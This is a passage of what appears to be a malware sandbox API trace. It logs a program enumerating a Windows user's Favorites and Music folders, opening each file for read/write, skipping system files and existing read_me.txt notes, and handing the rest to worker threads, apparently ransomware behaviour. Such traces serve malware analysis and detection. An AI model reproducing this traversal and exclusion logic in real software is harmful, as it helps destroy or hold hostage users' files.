ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0076.125] wnsprintfW (in: pszDest=0x8b400a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 82 [0076.125] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8f8 [0076.140] StrStrW (lpFirst="microsoft store.url", lpSrch="read_me.txt") returned 0x0 [0076.140] StrStrW (lpFirst="microsoft store.url", lpSrch="autoexec.bat") returned 0x0 [0076.140] StrStrW (lpFirst="microsoft store.url", lpSrch="desktop.ini") returned 0x0 [0076.140] StrStrW (lpFirst="microsoft store.url", lpSrch="autorun.inf") returned 0x0 [0076.140] StrStrW (lpFirst="microsoft store.url", lpSrch="ntuser.dat") returned 0x0 [0076.140] StrStrW (lpFirst="microsoft store.url", lpSrch="iconcache.db") returned 0x0 [0076.140] StrStrW (lpFirst="microsoft store.url", lpSrch="bootsect.bak") returned 0x0 [0076.140] StrStrW (lpFirst="microsoft store.url", lpSrch="boot.ini") returned 0x0 [0076.140] StrStrW (lpFirst="microsoft store.url", lpSrch="ntuser.dat.log") returned 0x0 [0076.140] StrStrW (lpFirst="microsoft store.url", lpSrch="thumbs.db") returned 0x0 [0076.140] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 102 [0076.140] QueueUserWorkItem (Function=0x404e00, Context=0x8f8, Flags=0x0) returned 1 [0076.140] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24a37460, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24a37460, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24a37460, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.140] wnsprintfW (in: pszDest=0x8b400a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\read_me.txt") returned 74 [0076.140] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x918 [0076.140] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0076.140] CloseHandle (hObject=0x918) returned 1 [0076.140] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24a37460, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24a37460, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24a37460, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0076.140] FindClose (in: hFindFile=0x7cfe9e8 | out: hFindFile=0x7cfe9e8) returned 1 [0076.141] wnsprintfW (in: pszDest=0x8b400a8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\read_me.txt") returned 74 [0076.141] GetProcessHeap () returned 0x4f10000 [0076.141] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b400a8 | out: hHeap=0x4f10000) returned 1 [0076.141] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 63 [0076.141] GetProcessHeap () returned 0x4f10000 [0076.141] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ca1060 | out: hHeap=0x4f10000) returned 1 [0076.141] GetProcessHeap () returned 0x4f10000 [0076.141] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ca0058 [0076.141] wnsprintfW (in: pszDest=0x8ca0058, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*") returned 58 [0076.141] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24acf9e0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24acf9e0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe9e8 [0076.141] wnsprintfW (in: pszDest=0x8ca0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\.") returned 58 [0076.141] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24acf9e0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24acf9e0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.141] wnsprintfW (in: pszDest=0x8ca0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\..") returned 59 [0076.141] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0076.141] wnsprintfW (in: pszDest=0x8ca0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned 70 [0076.141] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x918 [0076.141] StrStrW (lpFirst="msn autos.url", lpSrch="read_me.txt") returned 0x0 [0076.141] StrStrW (lpFirst="msn autos.url", lpSrch="autoexec.bat") returned 0x0 [0076.141] StrStrW (lpFirst="msn autos.url", lpSrch="desktop.ini") returned 0x0 [0076.141] StrStrW (lpFirst="msn autos.url", lpSrch="autorun.inf") returned 0x0 [0076.141] StrStrW (lpFirst="msn autos.url", lpSrch="ntuser.dat") returned 0x0 [0076.142] StrStrW (lpFirst="msn autos.url", lpSrch="iconcache.db") returned 0x0 [0076.142] StrStrW (lpFirst="msn autos.url", lpSrch="bootsect.bak") returned 0x0 [0076.142] StrStrW (lpFirst="msn autos.url", lpSrch="boot.ini") returned 0x0 [0076.142] StrStrW (lpFirst="msn autos.url", lpSrch="ntuser.dat.log") returned 0x0 [0076.142] StrStrW (lpFirst="msn autos.url", lpSrch="thumbs.db") returned 0x0 [0076.142] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 103 [0076.142] QueueUserWorkItem (Function=0x404e00, Context=0x918, Flags=0x0) returned 1 [0076.142] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0076.142] wnsprintfW (in: pszDest=0x8ca0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 78 [0076.142] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x920 [0076.147] StrStrW (lpFirst="msn entertainment.url", lpSrch="read_me.txt") returned 0x0 [0076.147] StrStrW (lpFirst="msn entertainment.url", lpSrch="autoexec.bat") returned 0x0 [0076.147] StrStrW (lpFirst="msn entertainment.url", lpSrch="desktop.ini") returned 0x0 [0076.147] StrStrW (lpFirst="msn entertainment.url", lpSrch="autorun.inf") returned 0x0 [0076.147] StrStrW (lpFirst="msn entertainment.url", lpSrch="ntuser.dat") returned 0x0 [0076.147] StrStrW (lpFirst="msn entertainment.url", lpSrch="iconcache.db") returned 0x0 [0076.147] StrStrW (lpFirst="msn entertainment.url", lpSrch="bootsect.bak") returned 0x0 [0076.147] StrStrW (lpFirst="msn entertainment.url", lpSrch="boot.ini") returned 0x0 [0076.147] StrStrW (lpFirst="msn entertainment.url", lpSrch="ntuser.dat.log") returned 0x0 [0076.147] StrStrW (lpFirst="msn entertainment.url", lpSrch="thumbs.db") returned 0x0 [0076.147] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 104 [0076.147] QueueUserWorkItem (Function=0x404e00, Context=0x920, Flags=0x0) returned 1 [0076.147] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0076.147] wnsprintfW (in: pszDest=0x8ca0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url") returned 70 [0076.147] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x92c [0076.153] StrStrW (lpFirst="msn money.url", lpSrch="read_me.txt") returned 0x0 [0076.153] StrStrW (lpFirst="msn money.url", lpSrch="autoexec.bat") returned 0x0 [0076.153] StrStrW (lpFirst="msn money.url", lpSrch="desktop.ini") returned 0x0 [0076.153] StrStrW (lpFirst="msn money.url", lpSrch="autorun.inf") returned 0x0 [0076.153] StrStrW (lpFirst="msn money.url", lpSrch="ntuser.dat") returned 0x0 [0076.153] StrStrW (lpFirst="msn money.url", lpSrch="iconcache.db") returned 0x0 [0076.153] StrStrW (lpFirst="msn money.url", lpSrch="bootsect.bak") returned 0x0 [0076.153] StrStrW (lpFirst="msn money.url", lpSrch="boot.ini") returned 0x0 [0076.153] StrStrW (lpFirst="msn money.url", lpSrch="ntuser.dat.log") returned 0x0 [0076.153] StrStrW (lpFirst="msn money.url", lpSrch="thumbs.db") returned 0x0 [0076.153] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 107 [0076.153] QueueUserWorkItem (Function=0x404e00, Context=0x92c, Flags=0x0) returned 1 [0076.153] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0076.153] wnsprintfW (in: pszDest=0x8ca0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url") returned 71 [0076.153] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x91c [0076.156] StrStrW (lpFirst="msn sports.url", lpSrch="read_me.txt") returned 0x0 [0076.156] StrStrW (lpFirst="msn sports.url", lpSrch="autoexec.bat") returned 0x0 [0076.156] StrStrW (lpFirst="msn sports.url", lpSrch="desktop.ini") returned 0x0 [0076.156] StrStrW (lpFirst="msn sports.url", lpSrch="autorun.inf") returned 0x0 [0076.157] StrStrW (lpFirst="msn sports.url", lpSrch="ntuser.dat") returned 0x0 [0076.157] StrStrW (lpFirst="msn sports.url", lpSrch="iconcache.db") returned 0x0 [0076.157] StrStrW (lpFirst="msn sports.url", lpSrch="bootsect.bak") returned 0x0 [0076.157] StrStrW (lpFirst="msn sports.url", lpSrch="boot.ini") returned 0x0 [0076.157] StrStrW (lpFirst="msn sports.url", lpSrch="ntuser.dat.log") returned 0x0 [0076.157] StrStrW (lpFirst="msn sports.url", lpSrch="thumbs.db") returned 0x0 [0076.157] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 109 [0076.157] QueueUserWorkItem (Function=0x404e00, Context=0x91c, Flags=0x0) returned 1 [0076.157] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0076.157] wnsprintfW (in: pszDest=0x8ca0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url") returned 64 [0076.157] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x938 [0076.157] StrStrW (lpFirst="msn.url", lpSrch="read_me.txt") returned 0x0 [0076.157] StrStrW (lpFirst="msn.url", lpSrch="autoexec.bat") returned 0x0 [0076.157] StrStrW (lpFirst="msn.url", lpSrch="desktop.ini") returned 0x0 [0076.157] StrStrW (lpFirst="msn.url", lpSrch="autorun.inf") returned 0x0 [0076.157] StrStrW (lpFirst="msn.url", lpSrch="ntuser.dat") returned 0x0 [0076.157] StrStrW (lpFirst="msn.url", lpSrch="iconcache.db") returned 0x0 [0076.157] StrStrW (lpFirst="msn.url", lpSrch="bootsect.bak") returned 0x0 [0076.157] StrStrW (lpFirst="msn.url", lpSrch="boot.ini") returned 0x0 [0076.157] StrStrW (lpFirst="msn.url", lpSrch="ntuser.dat.log") returned 0x0 [0076.157] StrStrW (lpFirst="msn.url", lpSrch="thumbs.db") returned 0x0 [0076.157] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 110 [0076.157] QueueUserWorkItem (Function=0x404e00, Context=0x938, Flags=0x0) returned 1 [0076.157] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0076.158] wnsprintfW (in: pszDest=0x8ca0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url") returned 71 [0076.158] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x93c [0076.166] StrStrW (lpFirst="msnbc news.url", lpSrch="read_me.txt") returned 0x0 [0076.167] StrStrW (lpFirst="msnbc news.url", lpSrch="autoexec.bat") returned 0x0 [0076.167] StrStrW (lpFirst="msnbc news.url", lpSrch="desktop.ini") returned 0x0 [0076.167] StrStrW (lpFirst="msnbc news.url", lpSrch="autorun.inf") returned 0x0 [0076.167] StrStrW (lpFirst="msnbc news.url", lpSrch="ntuser.dat") returned 0x0 [0076.167] StrStrW (lpFirst="msnbc news.url", lpSrch="iconcache.db") returned 0x0 [0076.167] StrStrW (lpFirst="msnbc news.url", lpSrch="bootsect.bak") returned 0x0 [0076.167] StrStrW (lpFirst="msnbc news.url", lpSrch="boot.ini") returned 0x0 [0076.167] StrStrW (lpFirst="msnbc news.url", lpSrch="ntuser.dat.log") returned 0x0 [0076.167] StrStrW (lpFirst="msnbc news.url", lpSrch="thumbs.db") returned 0x0 [0076.167] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 111 [0076.167] QueueUserWorkItem (Function=0x404e00, Context=0x93c, Flags=0x0) returned 1 [0076.167] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24acf9e0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24acf9e0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24acf9e0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.167] wnsprintfW (in: pszDest=0x8ca0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\read_me.txt") returned 68 [0076.167] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x940 [0076.167] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0076.167] CloseHandle (hObject=0x940) returned 1 [0076.167] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24acf9e0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24acf9e0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24acf9e0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0076.167] FindClose (in: hFindFile=0x7cfe9e8 | out: hFindFile=0x7cfe9e8) returned 1 [0076.167] wnsprintfW (in: pszDest=0x8ca0058, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\read_me.txt") returned 68 [0076.167] GetProcessHeap () returned 0x4f10000 [0076.167] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ca0058 | out: hHeap=0x4f10000) returned 1 [0076.167] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 66 [0076.168] GetProcessHeap () returned 0x4f10000 [0076.168] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8cb1068 | out: hHeap=0x4f10000) returned 1 [0076.168] GetProcessHeap () returned 0x4f10000 [0076.168] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b700c0 [0076.168] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*") returned 41 [0076.168] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24822120, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24822120, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe9e8 [0076.168] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\.") returned 41 [0076.168] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24822120, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24822120, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.168] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\..") returned 42 [0076.168] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b394170, ftCreationTime.dwHighDateTime=0x1d4ca18, ftLastAccessTime.dwLowDateTime=0x24bb4220, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24bb4220, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3irpEEnGfRfssd", cAlternateFileName="3IRPEE~1")) returned 1 [0076.168] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd") returned 54 [0076.168] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9dd6c590, ftCreationTime.dwHighDateTime=0x1d4cfb7, ftLastAccessTime.dwLowDateTime=0x24c26640, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24c26640, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6sJ5Nvd", cAlternateFileName="")) returned 1 [0076.168] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\6sJ5Nvd") returned 47 [0076.168] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.168] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini") returned 51 [0076.168] CreateFileW 